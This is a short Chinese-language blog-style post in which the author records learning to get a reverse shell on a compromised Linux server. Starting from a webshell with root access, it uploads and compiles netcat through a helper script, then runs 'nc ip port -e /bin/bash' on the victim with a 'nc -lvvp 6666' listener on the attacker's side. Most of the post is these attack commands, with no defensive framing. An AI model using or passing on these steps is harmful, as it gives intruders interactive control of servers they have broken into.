Linux 反弹shell,一直都有听说过,可惜自己不会。今天受xz指点,学会了。特记录一下。
root
权限,非常好,省得提权了。
由于Linux我们在
webshell
里面是不好进行交互的,所以我们需要进行反弹shell
操作。
首页我们通过webshell
上传nc
源码到linux
服务器上
然后我们进行解压、编译操作
tar -zxvf /tmp/nc/netcat.tar.gz -C /tmp/nc
由于在webshell里面无法切换目录,而编译文件需要在源码目录下进行。
所以我们可以编写一个sh脚本,让它执行编译操作。
/tmp/nc/netcat-0.7.1/./configure --prefix=/tmp/nc/netcat/ && make && make install
最后就是最重要的看点,linux
反弹shell
。
服务端执行如下命令:
nc ip port -e /bin/bash
攻击端进行监听:
nc -lvvp 6666
反弹shell
成功
总结:
- 学会请教人,自己不会,但可以请教有经验的人把它学会。
- 方法很重要